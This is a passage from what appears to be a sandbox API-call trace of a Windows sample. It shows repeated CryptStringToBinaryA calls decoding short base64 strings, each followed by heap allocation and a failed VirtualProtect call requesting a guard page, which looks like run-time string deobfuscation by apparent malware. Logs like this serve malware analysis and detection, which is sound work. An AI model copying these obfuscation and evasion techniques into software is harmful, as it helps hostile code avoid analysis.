pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.012] CryptStringToBinaryA (in: pszString="UhqSQ/fHMydMOHy2", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.012] GetProcessHeap () returned 0x5b0000 [0181.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9660 [0181.012] VirtualProtect (in: lpAddress=0x5b9660, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.012] GetProcessHeap () returned 0x5b0000 [0181.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5b42a8 [0181.013] CryptStringToBinaryA (in: pszString="ShycR8GICSsbfQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.013] CryptStringToBinaryA (in: pszString="ShycR8GICSsbfQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.013] GetProcessHeap () returned 0x5b0000 [0181.013] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9ac0 [0181.013] VirtualProtect (in: lpAddress=0x5b9ac0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.013] GetProcessHeap () returned 0x5b0000 [0181.013] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5ba1f0 [0181.013] CryptStringToBinaryA (in: pszString="WhyCUveGHm5tPCjxaMjLP2F5", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.013] CryptStringToBinaryA (in: pszString="WhyCUveGHm5tPCjxaMjLP2F5", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.013] GetProcessHeap () returned 0x5b0000 [0181.013] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9bd8 [0181.013] VirtualProtect (in: lpAddress=0x5b9bd8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.013] GetProcessHeap () returned 0x5b0000 [0181.013] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5ba208 [0181.013] CryptStringToBinaryA (in: pszString="VRCIQPSGFSoBESf4etzNPT4qcJs=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.013] CryptStringToBinaryA (in: pszString="VRCIQPSGFSoBESf4etzNPT4qcJs=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.013] GetProcessHeap () returned 0x5b0000 [0181.013] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8fd0 [0181.013] VirtualProtect (in: lpAddress=0x5b8fd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.014] GetProcessHeap () returned 0x5b0000 [0181.014] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5ba228 [0181.014] CryptStringToBinaryA (in: pszString="VwbRbvqXEyFRZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.014] CryptStringToBinaryA (in: pszString="VwbRbvqXEyFRZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.014] GetProcessHeap () returned 0x5b0000 [0181.014] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba900 [0181.014] VirtualProtect (in: lpAddress=0x5ba900, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.014] GetProcessHeap () returned 0x5b0000 [0181.014] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bc250 [0181.014] CryptStringToBinaryA (in: pszString="TgeeQf6UFCFTZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.014] CryptStringToBinaryA (in: pszString="TgeeQf6UFCFTZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.014] GetProcessHeap () returned 0x5b0000 [0181.014] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bbcb0 [0181.015] VirtualProtect (in: lpAddress=0x5bbcb0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.015] GetProcessHeap () returned 0x5b0000 [0181.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bc268 [0181.015] CryptStringToBinaryA (in: pszString="VxuCVvqLCytFfRTXUJOM", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.015] CryptStringToBinaryA (in: pszString="VxuCVvqLCytFfRTXUJOM", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.015] GetProcessHeap () returned 0x5b0000 [0181.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb508 [0181.015] VirtualProtect (in: lpAddress=0x5bb508, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.015] GetProcessHeap () returned 0x5b0000 [0181.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5bc3c8 [0181.015] CryptStringToBinaryA (in: pszString="USbLAg==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.015] CryptStringToBinaryA (in: pszString="USbLAg==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.015] GetProcessHeap () returned 0x5b0000 [0181.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5baf90 [0181.015] VirtualProtect (in: lpAddress=0x5baf90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.015] GetProcessHeap () returned 0x5b0000 [0181.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5b45a0 [0181.015] CryptStringToBinaryA (in: pszString="Pl0=", cchString=0x4, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.015] CryptStringToBinaryA (in: pszString="Pl0=", cchString=0x4, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.015] GetProcessHeap () returned 0x5b0000 [0181.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bad60 [0181.016] VirtualProtect (in: lpAddress=0x5bad60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.016] GetProcessHeap () returned 0x5b0000 [0181.016] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3) returned 0x5b0598 [0181.016] CryptStringToBinaryA (in: pszString="PjeYVrI=", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.016] CryptStringToBinaryA (in: pszString="PjeYVrI=", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.016] GetProcessHeap () returned 0x5b0000 [0181.016] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb1c0 [0181.016] VirtualProtect (in: lpAddress=0x5bb1c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.016] GetProcessHeap () returned 0x5b0000 [0181.016] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6) returned 0x5b2928 [0181.016] CryptStringToBinaryA (in: pszString="SByVR/SEBjxFZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.016] CryptStringToBinaryA (in: pszString="SByVR/SEBjxFZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.016] GetProcessHeap () returned 0x5b0000 [0181.016] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bbb98 [0181.016] VirtualProtect (in: lpAddress=0x5bbb98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.017] GetProcessHeap () returned 0x5b0000 [0181.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bc320 [0181.017] CryptStringToBinaryA (in: pszString="WhyCUveGHm5zODX5cdzYMzQ3cJs=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.017] CryptStringToBinaryA (in: pszString="WhyCUveGHm5zODX5cdzYMzQ3cJs=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.017] GetProcessHeap () returned 0x5b0000 [0181.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba4a0 [0181.017] VirtualProtect (in: lpAddress=0x5ba4a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.017] GetProcessHeap () returned 0x5b0000 [0181.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc488 [0181.017] CryptStringToBinaryA (in: pszString="TjbRTPqKAnQB", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.017] CryptStringToBinaryA (in: pszString="TjbRTPqKAnQB", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.017] GetProcessHeap () returned 0x5b0000 [0181.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb738 [0181.017] VirtualProtect (in: lpAddress=0x5bb738, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.017] GetProcessHeap () returned 0x5b0000 [0181.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bc3e0 [0181.017] CryptStringToBinaryA (in: pszString="SwaUULuJBiNEZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.017] CryptStringToBinaryA (in: pszString="SwaUULuJBiNEZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.017] GetProcessHeap () returned 0x5b0000 [0181.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bba80 [0181.018] VirtualProtect (in: lpAddress=0x5bba80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.018] GetProcessHeap () returned 0x5b0000 [0181.018] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bc380 [0181.018] CryptStringToBinaryA (in: pszString="WhqcQ/KJRyBAMCOsPQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.018] CryptStringToBinaryA (in: pszString="WhqcQ/KJRyBAMCOsPQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.018] GetProcessHeap () returned 0x5b0000 [0181.018] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bae78 [0181.018] VirtualProtect (in: lpAddress=0x5bae78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.018] GetProcessHeap () returned 0x5b0000 [0181.018] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5bc2d8 [0181.018] CryptStringToBinaryA (in: pszString="UxSSSvKJAgdlZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.018] CryptStringToBinaryA (in: pszString="UxSSSvKJAgdlZ2Y=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.018] GetProcessHeap () returned 0x5b0000 [0181.018] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb2d8 [0181.018] VirtualProtect (in: lpAddress=0x5bb2d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.018] GetProcessHeap () returned 0x5b0000 [0181.018] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bc3f8 [0181.018] CryptStringToBinaryA (in: pszString="WSC4ZqHH", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.018] CryptStringToBinaryA (in: pszString="WSC4ZqHH", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.019] GetProcessHeap () returned 0x5b0000 [0181.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bbdc8 [0181.019] VirtualProtect (in: lpAddress=0x5bbdc8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.019] GetProcessHeap () returned 0x5b0000 [0181.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5b2950 [0181.019] CryptStringToBinaryA (in: pszString="VxuCVvqLCytFfRX5e93bOyk8cJs=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.019] CryptStringToBinaryA (in: pszString="VxuCVvqLCytFfRX5e93bOyk8cJs=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.019] GetProcessHeap () returned 0x5b0000 [0181.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb0a8 [0181.019] VirtualProtect (in: lpAddress=0x5bb0a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.019] GetProcessHeap () returned 0x5b0000 [0181.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc4a8 [0181.019] CryptStringToBinaryA (in: pszString="bQyCVv6KSTpZKQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.019] CryptStringToBinaryA (in: pszString="bQyCVv6KSTpZKQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.019] GetProcessHeap () returned 0x5b0000 [0181.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba6d0 [0181.019] VirtualProtect (in: lpAddress=0x5ba6d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.019] GetProcessHeap () returned 0x5b0000 [0181.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5bc338 [0181.020] CryptStringToBinaryA (in: pszString="WQeQQPmCFRIELmjsdNk=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.020] CryptStringToBinaryA (in: pszString="WQeQQPmCFRIELmjsdNk=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.020] GetProcessHeap () returned 0x5b0000 [0181.020] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bbee0 [0181.020] VirtualProtect (in: lpAddress=0x5bbee0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.020] GetProcessHeap () returned 0x5b0000 [0181.020] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5bc2c0 [0181.020] CryptStringToBinaryA (in: pszString="OzShct+mMw8E", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.020] CryptStringToBinaryA (in: pszString="OzShct+mMw8E", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.020] GetProcessHeap () returned 0x5b0000 [0181.020] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bbff8 [0181.020] VirtualProtect (in: lpAddress=0x5bbff8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.020] GetProcessHeap () returned 0x5b0000 [0181.020] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bc308 [0181.020] CryptStringToBinaryA (in: pszString="Ozm+YdqrJh5xGQfCXIw=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.020] CryptStringToBinaryA (in: pszString="Ozm+YdqrJh5xGQfCXIw=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.021] GetProcessHeap () returned 0x5b0000 [0181.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5baa18 [0181.021] VirtualProtect (in: lpAddress=0x5baa18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.021] GetProcessHeap () returned 0x5b0000 [0181.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5bc350 [0181.021] CryptStringToBinaryA (in: pszString="OyCiZ8m3NQFnFArTOA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.021] CryptStringToBinaryA (in: pszString="OyCiZ8m3NQFnFArTOA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.021] GetProcessHeap () returned 0x5b0000 [0181.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba7e8 [0181.021] VirtualProtect (in: lpAddress=0x5ba7e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.021] GetProcessHeap () returned 0x5b0000 [0181.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5bc3b0 [0181.021] CryptStringToBinaryA (in: pszString="OzG0cdCzKB4E", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.021] CryptStringToBinaryA (in: pszString="OzG0cdCzKB4E", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.021] GetProcessHeap () returned 0x5b0000 [0181.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bab30 [0181.022] VirtualProtect (in: lpAddress=0x5bab30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.022] GetProcessHeap () returned 0x5b0000 [0181.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bc410 [0181.022] CryptStringToBinaryA (in: pszString="SRSdTv6TFBI=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.022] CryptStringToBinaryA (in: pszString="SRSdTv6TFBI=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.022] GetProcessHeap () returned 0x5b0000 [0181.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb3f0 [0181.022] VirtualProtect (in: lpAddress=0x5bb3f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.022] GetProcessHeap () returned 0x5b0000 [0181.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bc368 [0181.022] CryptStringToBinaryA (in: pszString="WwGZR+mCEiM=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.022] CryptStringToBinaryA (in: pszString="WwGZR+mCEiM=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.022] GetProcessHeap () returned 0x5b0000 [0181.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb620 [0181.022] VirtualProtect (in: lpAddress=0x5bb620, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.022] GetProcessHeap () returned 0x5b0000 [0181.023] RtlAllocateHeap (HeapHandle=0x5b0000, 